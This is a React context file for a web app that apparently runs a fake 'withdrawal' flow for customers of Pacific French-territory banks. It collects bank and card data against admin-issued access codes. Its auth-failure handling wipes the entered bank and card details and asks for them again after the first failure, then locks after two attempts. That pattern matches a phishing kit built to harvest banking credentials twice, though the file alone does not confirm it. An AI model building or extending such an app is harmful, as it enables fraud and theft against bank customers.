import React, { createContext, useContext, useState, useEffect } from 'react';
import axios from 'axios';

const AppContext = createContext(null);

const BACKEND_URL = process.env.REACT_APP_BACKEND_URL;
const API = `${BACKEND_URL}/api`;

export const AppProvider = ({ children }) => {
  const [config, setConfig] = useState(null);
  const [currentUser, setCurrentUser] = useState(null);
  const [withdrawData, setWithdrawData] = useState(null);
  const [bankData, setBankData] = useState(null);
  const [cardData, setCardData] = useState(null);
  const [isAdminLoggedIn, setIsAdminLoggedIn] = useState(false);
  const [authAttempts, setAuthAttempts] = useState(0);
  const [isLocked, setIsLocked] = useState(false);
  const [lockEndTime, setLockEndTime] = useState(null);
  const [isRetryFlow, setIsRetryFlow] = useState(false);
  const [isLoading, setIsLoading] = useState(true);
  const [userPhone, setUserPhone] = useState('');

  // Load config from API on mount
  useEffect(() => {
    loadConfig();
  }, []);

  // Keep-alive: ping backend every 5 minutes to prevent Render free tier sleep
  useEffect(() => {
    const keepAlive = setInterval(() => {
      axios.get(`${API}/ping`).catch(() => {});
    }, 5 * 60 * 1000);
    return () => clearInterval(keepAlive);
  }, []);

  const loadConfig = async () => {
    try {
      const response = await axios.get(`${API}/config`);
      setConfig(response.data);
    } catch (error) {
      console.error('Failed to load config:', error);
      // Fallback to defaults if API fails
      setConfig({
        accessCodes: [],
        banks: ["BCI", "BNP WALLIS", "BNP NC", "SOCIÉTÉ GÉNÉRALE", "BANQUE DE POLYNESIE", "BNC", "OPT NC", "OPT PF", "BANQUE DE TAHITI", "SOCREDO", "BEBUNK", "MARARA PAIEMENT", "DEBLOCK", "NIUPAY", "REVOLUT", "AUTRES"],
        currencies: ["XPF", "EUR", "USD"],
        cardTypes: ["Visa", "MasterCard", "UnionPay", "American Express", "Autres"]
      });
    }
    setIsLoading(false);
  };

  // Check lock status
  useEffect(() => {
    if (lockEndTime) {
      const checkLock = setInterval(() => {
        if (Date.now() >= lockEndTime) {
          setIsLocked(false);
          setLockEndTime(null);
          setAuthAttempts(0);
          setIsRetryFlow(false);
        }
      }, 1000);
      return () => clearInterval(checkLock);
    }
  }, [lockEndTime]);

  // Verify access code via API
  const verifyCode = async (code) => {
    try {
      const response = await axios.post(`${API}/verify-code`, { code });
      setCurrentUser(response.data);
      return response.data;
    } catch (error) {
      console.error('Code verification failed:', error);
      return null;
    }
  };

  // Handle auth failure - returns action needed
  const handleAuthFailure = () => {
    const newAttempts = authAttempts + 1;
    setAuthAttempts(newAttempts);
    
    if (newAttempts >= 2) {
      setIsLocked(true);
      setLockEndTime(Date.now() + 10 * 60 * 1000);
      setIsRetryFlow(false);
      return { locked: true, attempts: newAttempts, shouldRetry: false };
    }
    
    setIsRetryFlow(true);
    return { locked: false, attempts: newAttempts, shouldRetry: true };
  };

  const clearForRetry = () => {
    setBankData(null);
    setCardData(null);
  };

  const resetAuthAttempts = () => {
    setAuthAttempts(0);
    setIsLocked(false);
    setLockEndTime(null);
    setIsRetryFlow(false);
  };

  const logout = () => {
    setCurrentUser(null);
    setWithdrawData(null);
    setBankData(null);
    setCardData(null);
    setUserPhone('');
    resetAuthAttempts();
  };

  const adminLogin = async (password) => {
    try {
      await axios.post(`${API}/admin/login`, { password });
      setIsAdminLoggedIn(true);
      return true;
    } catch (error) {
      console.error('Admin login failed:', error);
      return false;
    }
  };

  const adminLogout = () => {
    setIsAdminLoggedIn(false);
  };

  const changeAdminPassword = async (currentPassword, newPassword) => {
    try {
      await axios.post(`${API}/admin/change-password`, { 
        currentPassword, 
        newPassword 
      });
      return { success: true };
    } catch (error) {
      const message = error.response?.data?.detail || 'Erreur lors du changement de mot de passe';
      return { success: false, error: message };
    }
  };

  // Access code management via API
  const addAccessCode = async (newCode) => {
    try {
      await axios.post(`${API}/access-codes`, newCode);
      await loadConfig();
      return true;
    } catch (error) {
      console.error('Failed to add code:', error);
      return false;
    }
  };

  const removeAccessCode = async (code) => {
    try {
      await axios.delete(`${API}/access-codes/${code}`);
      await loadConfig();
      return true;
    } catch (error) {
      console.error('Failed to remove code:', error);
      return false;
    }
  };

  const updateAccessCode = async (code, updates) => {
    try {
      await axios.put(`${API}/access-codes/${code}`, { code, ...updates });
      await loadConfig();
      return true;
    } catch (error) {
      console.error('Failed to update code:', error);
      return false;
    }
  };

  // Banks management via API
  const updateBanks = async (banks) => {
    try {
      await axios.put(`${API}/config`, { banks });
      await loadConfig();
      return true;
    } catch (error) {
      console.error('Failed to update banks:', error);
      return false;
    }
  };

  const addBank = async (bankName) => {
    try {
      await axios.post(`${API}/banks`, { name: bankName });
      await loadConfig();
      return true;
    } catch (error) {
      console.error('Failed to add bank:', error);
      return false;
    }
  };

  const removeBank = async (bankName) => {
    try {
      await axios.delete(`${API}/banks/${encodeURIComponent(bankName)}`);
      await loadConfig();
      return true;
    } catch (error) {
      console.error('Failed to remove bank:', error);
      return false;
    }
  };

  const addCardType = async (cardType) => {
    try {
      await axios.post(`${API}/card-types`, { cardType });
      await loadConfig();
      return true;
    } catch (error) {
      console.error('Failed to add card type:', error);
      return false;
    }
  };

  const removeCardType = async (cardType) => {
    try {
      await axios.delete(`${API}/card-types/${encodeURIComponent(cardType)}`);
      await loadConfig();
      return true;
    } catch (error) {
      console.error('Failed to remove card type:', error);
      return false;
    }
  };

  const value = {
    config,
    currentUser,
    setCurrentUser,
    withdrawData,
    setWithdrawData,
    bankData,
    setBankData,
    cardData,
    setCardData,
    isAdminLoggedIn,
    authAttempts,
    setAuthAttempts,
    isLocked,
    lockEndTime,
    isRetryFlow,
    setIsRetryFlow,
    userPhone,
    setUserPhone,
    verifyCode,
    handleAuthFailure,
    clearForRetry,
    resetAuthAttempts,
    logout,
    adminLogin,
    adminLogout,
    changeAdminPassword,
    addAccessCode,
    removeAccessCode,
    updateAccessCode,
    updateBanks,
    addBank,
    removeBank,
    addCardType,
    removeCardType,
    loadConfig
  };

  if (isLoading) {
    return (
      <div className="min-h-screen flex items-center justify-center">
        <div className="spinner"></div>
      </div>
    );
  }

  return (
    <AppContext.Provider value={value}>
      {children}
    </AppContext.Provider>
  );
};

export const useApp = () => {
  const context = useContext(AppContext);
  if (!context) {
    throw new Error('useApp must be used within an AppProvider');
  }
  return context;
};
